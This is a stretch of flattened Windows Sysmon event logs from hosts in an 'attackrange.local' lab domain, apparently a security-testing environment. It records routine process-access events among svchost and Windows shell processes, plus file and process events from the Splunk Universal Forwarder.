07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x8000000000000000808029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:51.806{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B615F6103087DB6062341B1B919EF83,SHA256=FA0D14E9F413B2F2AABE952F2B643D839C56BFFE515B2D999A949ECD8C46BE74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.826{466BC892-F54B-60EB-4F7D-00000000CF01}9376420C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.590{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E27C6F0096210527D98111FDF7E38069,SHA256=C0B623D8EEA82BF598899059FBE36BF34B7C560AE9AFF86BC077D8B5F58706E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B83D4A005D9B20FF2375DC865001B450,SHA256=31D6F38DC7FF644EE687F21D6C58CAA632F168D4E83F3E3A9B308915A25D04A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35DA5F5B2D9F273039BDFC03DEACB530,SHA256=590E3C91D8411BD84D01C86820176AB530A4C7FED00171CA3BB3D7F2E01D10AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:52.837{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB228DA9774801393C35586B607E9D97,SHA256=9FF97E1C5EBE832A7C71A1A2A3847A3C2E508D48838C4048527F8959353E366E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.973{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 